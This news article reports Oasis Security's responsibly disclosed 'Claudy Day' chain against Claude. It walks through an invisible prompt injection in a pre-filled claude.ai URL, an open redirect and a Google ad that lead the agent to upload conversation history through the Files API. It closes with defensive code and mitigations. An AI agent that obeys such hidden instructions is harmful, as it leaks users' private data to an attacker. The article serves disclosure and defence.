Researchers from Oasis Security recently identified a vulnerability chain in Anthropic's Claude artificial intelligence (AI) agent. When combined, these three flaws—dubbed "Claudy Day"—could allow unauthorized parties to embed hidden instructions in a pre-filled chat URL via a Google search. This mechanism could lead to the unintended exfiltration of sensitive user data and expose users to unauthorized links mimicking legitimate search results.
According to a report published Wednesday by the Oasis Security Research Team, chaining these vulnerabilities creates a continuous path from user targeting to silent data exfiltration. The sequence begins when a user searches for Claude on Google and clicks a seemingly legitimate search result. This link is actually controlled by a malicious actor and contains a pre-filled prompt with hidden instructions. These instructions direct the AI agent to perform actions the user did not intend without requiring additional tools or Model Context Protocol (MCP) servers.
The three vulnerabilities are an invisible prompt injection via URL parameters on Claude.ai, a data exfiltration channel that uses the Anthropic Files API, and an open redirect on Claude.com.
Oasis researchers reported the findings to Anthropic through its responsible disclosure program. Anthropic has since remediated the prompt injection vulnerability and is working to address the remaining issues.
Mechanics of the vulnerability chain
The researchers outlined step by step how the sequence operates. An unauthorized party first crafts an injection URL in the claude.ai/new?q= format, containing hidden exfiltration instructions and their own API key embedded in invisible HTML tags. By wrapping this in the open redirect vulnerability using a claude.com/redirect/<crafted-url> link, the URL appears to originate from a trusted Anthropic domain.
The malicious actor can then create a Google ad using this redirect URL. Google validates the claude.com hostname, approving an ad that displays a URL identical to the legitimate Claude search result.
When users click the link, they are silently redirected from claude.com to claude.ai, landing on a pre-filled prompt. Because the visible text appears benign, the user is likely to submit the prompt. Claude then processes both the visible text and the hidden instructions.
These hidden instructions direct Claude to access the conversation history and write sensitive data to a file in the sandbox. The data is then uploaded to api.anthropic.com (the Files API) using the embedded API key. The unauthorized party can then locate the new upload in their own Anthropic account and read the exfiltrated data.
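Two of the three links in this chain are ordinary web-layer weaknesses: a redirect endpoint that forwards to any URL it is given, and a pre-filled prompt parameter that accepts markup the user cannot see. The following is an added example, written for this article and not code from Anthropic or Oasis Security, of the server-side checks that close both. The allowlist of redirect hosts, the FALLBACK_URL, the `q` parameter name and the sample URLs are assumptions constructed for the illustration.

```python
from html.parser import HTMLParser
from typing import Optional
from urllib.parse import parse_qs, urlparse

# Assumption: the redirect endpoint is only ever meant to send users to these
# first-party hosts. A real deployment would load this set from configuration.
ALLOWED_REDIRECT_HOSTS = {"claude.com", "www.claude.com", "claude.ai", "docs.claude.com"}
FALLBACK_URL = "https://claude.com/"

# Invisible code points that can hide text in a prompt without any HTML at all.
ZERO_WIDTH = ("\u200b", "\u200c", "\u200d", "\u2060", "\ufeff")


def safe_redirect_target(target: str) -> str:
    """Return `target` only if it is an https URL on an allowlisted host, else the fallback.

    An endpoint that forwards to whatever URL it is given is an open redirect: the
    trusted hostname lends its credibility to any destination. Checking the parsed
    hostname rather than a string prefix also rejects 'https://claude.com@other.example',
    where the allowlisted name is only the userinfo part.
    """
    parsed = urlparse(target)
    if parsed.scheme != "https" or not parsed.hostname:
        return FALLBACK_URL          # covers '//host/path' and non-https schemes
    if parsed.hostname.lower() not in ALLOWED_REDIRECT_HOSTS:
        return FALLBACK_URL
    return target


class _MarkupProbe(HTMLParser):
    """Counts HTML tags and comments found in a piece of text."""

    def __init__(self) -> None:
        super().__init__()
        self.markup_seen = 0

    def handle_starttag(self, tag, attrs):
        self.markup_seen += 1

    def handle_startendtag(self, tag, attrs):
        self.markup_seen += 1

    def handle_comment(self, data):
        self.markup_seen += 1


def prefill_from_url(url: str, max_len: int = 2000) -> Optional[str]:
    """Extract a pre-filled prompt from a `?q=` parameter, or None if it must not be used.

    A prompt the user is expected to review before sending must be plain text the
    user can actually see. Any HTML tag, HTML comment or zero-width character means
    part of the prompt could be invisible, so the whole prompt is refused rather
    than sanitised (stripping tags would silently keep their hidden content).
    """
    values = parse_qs(urlparse(url).query).get("q")   # parse_qs percent-decodes once
    if not values:
        return None
    text = values[0]
    if len(text) > max_len:
        return None
    probe = _MarkupProbe()
    probe.feed(text)
    probe.close()
    if probe.markup_seen:
        return None
    if any(ch in text for ch in ZERO_WIDTH):
        return None
    return text


if __name__ == "__main__":
    # Constructed sample inputs; PLACEHOLDER stands in for any hidden text.
    print(safe_redirect_target("https://docs.claude.com/start"))
    print(safe_redirect_target("https://attacker.example/"))
    print(prefill_from_url("https://claude.ai/new?q=Summarize+this+week"))
    print(prefill_from_url("https://claude.ai/new?q=Hi%3Cspan+style%3Ddisplay%3Anone%3EPLACEHOLDER%3C%2Fspan%3E"))
```

Note that the allowlist still permits a claude.com to claude.ai hop, which is why the two checks are layered: the redirect check stops the trusted-domain disguise, and the prefill check stops a hidden payload from reaching the chat box even when the destination itself is first-party. A stricter policy could refuse to pre-fill at all when the browser's Sec-Fetch-Site header reports a cross-site navigation, since a legitimate user typing a prompt never arrives that way.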
Impact severity and agent access
The potential impact of this vulnerability chain scales with the permissions and integrations available to the AI agent. In a standard Claude session without external integrations, the hidden injection can access conversation history and memory, extracting information from past chats and exfiltrating it via the Files API.
However, if the user's Claude session has MCP servers, tools, or integrations enabled, the injected prompt can trigger broader actions on the user's behalf. These actions can include reading local files, sending messages, accessing external APIs, or interacting with connected enterprise services. Any data accessed through these tools can then be exfiltrated.
As the Oasis research team noted, "For organizations deploying AI agents with access to enterprise systems, this [vulnerability] chain highlights a broader challenge: prompt integrity cannot be assumed when the delivery channel itself can be compromised."
Strengthening enterprise AI deployments
These findings emphasize prompt integrity as a critical security boundary for AI agents, particularly those with access to sensitive enterprise tools and historical context. As organizations integrate AI agents into employee workflows, securing these access points becomes essential.
While security researchers frequently evaluate Claude as one of the more secure AI assistants available, vulnerabilities still emerge in developing architectures. Previously, state-linked actors have also attempted to leverage Anthropic tools for cyber espionage, demonstrating the high value of these targets for unauthorized parties.
To help protect enterprise environments, we recommend organizations implement strong guardrails around AI agents as they gain broader access to internal resources. A fundamental security practice is applying the principle of least privilege to AI tools to reduce the impact of prompt injection vulnerabilities.
Following the specific guidance from the Oasis researchers, development teams should build in friction before automated actions execute.
"When MCP servers and integrations are available from the very first interaction, with no user confirmation, a single injected prompt can immediately leverage those tools," the researchers wrote. "Requiring explicit user approval before using the tool on the first prompt would add a meaningful barrier."
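The researchers' recommendation of an explicit approval step before a tool is first used, together with the least-privilege advice above, can be expressed as a small authorisation gate between the model's plan and tool execution. The following is an added example written for this article; it is not Anthropic's code or any MCP implementation. The ToolCall shape, the tool names, the ALWAYS_CONFIRM set and the approval policy are constructed assumptions, and it goes slightly beyond the quote by also treating a pre-filled first prompt as information the approver should see.

```python
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Set, Tuple


@dataclass
class ToolCall:
    """A tool invocation the model wants to make (constructed shape, not MCP's)."""
    name: str
    args: Dict[str, str]


@dataclass
class SessionState:
    """Per-conversation authorisation state."""
    prompt_count: int = 0
    prefilled_first_prompt: bool = False     # first prompt arrived via a pre-filled link
    approved_tools: Set[str] = field(default_factory=set)
    audit_log: List[Tuple[int, str, bool]] = field(default_factory=list)


# Assumed policy: tools that move data out of the session (constructed names) are
# confirmed on every use and never cached, because they are the exfiltration path.
ALWAYS_CONFIRM = {"files.upload", "messages.send", "http.request"}


class ToolGate:
    """Puts a human decision between the model's plan and any tool execution.

    Assumed policy:
      1. No tool runs in a session until the user has explicitly approved that tool,
         so the first prompt can never trigger tools on its own.
      2. The approver is told whether the first prompt was pre-filled rather than typed.
      3. Ordinary tools are approved once per session; ALWAYS_CONFIRM tools every time.
    """

    def __init__(self, approver: Callable[[SessionState, ToolCall], bool]):
        self._approver = approver   # returns True only when the human explicitly allows

    def start_prompt(self, session: SessionState, prefilled: bool = False) -> None:
        session.prompt_count += 1
        if session.prompt_count == 1:
            session.prefilled_first_prompt = prefilled

    def authorize(self, session: SessionState, call: ToolCall) -> bool:
        if call.name in session.approved_tools:      # never contains ALWAYS_CONFIRM tools
            return True
        allowed = bool(self._approver(session, call))
        session.audit_log.append((session.prompt_count, call.name, allowed))
        if allowed and call.name not in ALWAYS_CONFIRM:
            session.approved_tools.add(call.name)
        return allowed


def run_turn(gate: ToolGate, session: SessionState, prefilled: bool,
             planned_calls: List[ToolCall]) -> List[str]:
    """Simulate one agent turn: return the names of the planned calls that were allowed."""
    gate.start_prompt(session, prefilled)
    return [c.name for c in planned_calls if gate.authorize(session, c)]


if __name__ == "__main__":
    # Constructed human: declines anything requested on a pre-filled first prompt.
    def demo_approver(session: SessionState, call: ToolCall) -> bool:
        return not (session.prompt_count == 1 and session.prefilled_first_prompt)

    s = SessionState()
    g = ToolGate(demo_approver)
    plan = [ToolCall("files.read", {"path": "notes.txt"}),
            ToolCall("files.upload", {"path": "notes.txt"})]
    print(run_turn(g, s, True, plan))    # [] : nothing runs off a pre-filled first prompt
    print(run_turn(g, s, False, plan))   # both allowed after explicit approval
    print(s.audit_log)
```

The audit log is the part worth keeping in a real deployment: a denied tool request on a session's first prompt is exactly the signal that a delivered prompt, not the user, tried to act, and it is cheap to alert on.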